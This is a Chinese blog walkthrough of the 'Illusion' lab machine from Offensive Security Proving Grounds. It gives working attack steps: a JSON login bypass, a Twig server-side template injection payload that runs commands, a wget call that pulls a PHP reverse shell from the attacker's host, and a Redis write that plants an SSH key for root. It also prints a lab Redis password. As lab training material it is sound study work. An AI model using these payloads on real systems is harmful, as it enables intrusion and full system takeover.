Illusion

06613

简介

point 20

Illusion

Difficulty INTERMEDIATE

rated by community VERY HARD

 

Do you believe your eyes?

 

实验环境

攻击者 Kali 192.168.45.174

受害者 IP 192.168.199.203 Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A -p 22,80 192.168.199.203

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

 

FUZZ测试发现有一个/vendor目录

 

2. 漏洞发掘与利用

访问http://192.168.199.203/vendor/composer/installed.json

发现

        "name": "twig/twig",
        "version": "v1.19.0",
        "version_normalized": "1.19.0.0",

Google搜索 发现此漏洞

https://www.exploit-db.com/exploits/44102

Twig < 2.4.4 – Server Side Template Injection

是一个SSTI漏洞

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

 

但是我发现漏洞需要参数 

只能继续找参数

 

http://192.168.199.203/login.php

2024-04-14_21-20

https://book.hacktricks.xyz/pentesting-web/login-bypass

当”password”:”password”这种带引号的  可以尝试用下面的绕过

“password”:true

2024-04-14_21-22

 

2024-04-14_21-23

发现了参数

2024-04-14_21-24

 

在google中又发现POC

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md

 

测试发现只有这个能用

2024-04-14_21-25

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

 

2024-04-14_21-26

 

尝试上传php木马

先在木马目录监听

之后使用此方法上传

http://192.168.199.203/dashboard.php?name={{_self.env.registerUndefinedFilterCallback(%22exec%22)}}{{_self.env.getFilter(%22wget%20http://192.168.45.174/php-reverse-shell.php%20-O%20/var/www/html/shell.php%22)}}&submit=Submit+Query

 

我在木马中写入80端口

之后监听80端口

在其他终端中输入

curl "http://192.168.199.203/shell.php"

2024-04-14_21-32

拿到了shell

 

3. 权限提升

在/home/james中发现了redis-openssl-gen-pass.txt

是redis的密码

 

https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

这里的SSH可以使用

 

1. 先在Kali中生成ssh rsa

ssh-keygen -t rsa

2. 将id_rsa上传给受害者的/tmp

3. 

(echo -e "\n\n"; cat /tmp/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

4.

cat spaced_key.txt | redis-cli -h 127.0.0.1 -a "sgm5ZgEsCrj4L/0fi/1XGUcGII2GTuAjo3eotCFNy6ZManKrLWQaRCTOE6QpyCojpyr+Rix12VYbdOkA" -x set ssh_key

 

5. 登录redis

redis-cli -h 127.0.0.1 -a "sgm5ZgEsCrj4L/0fi/1XGUcGII2GTuAjo3eotCFNy6ZManKrLWQaRCTOE6QpyCojpyr+Rix12VYbdOkA"
config set dir /root/.ssh
config set dbfilename "authorized_keys"
save

 

6. SSH登录

cd /root/.ssh
ssh -i id_rsa root@192.168.199.203

2024-04-14_21-43

成功登录

 

 

 

 

 

 

 

 

 

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Offensive Security PG Practise
喜欢就支持一下吧
点赞13 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
Exfiltrated-白鸢的笔记
Exfiltrated
Exfiltrated
1年前 92
Flimsy-白鸢的笔记
Flimsy
Flimsy
1年前 91
LaVita-白鸢的笔记
LaVita
LaVita
1年前 85
Jacko-白鸢的笔记
Jacko
Jacko
1年前 83
DepthB2R SSH远程代码执行-白鸢的笔记
DepthB2R SSH远程代码执行
DepthB2R SSH远程代码执行
1年前 76
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片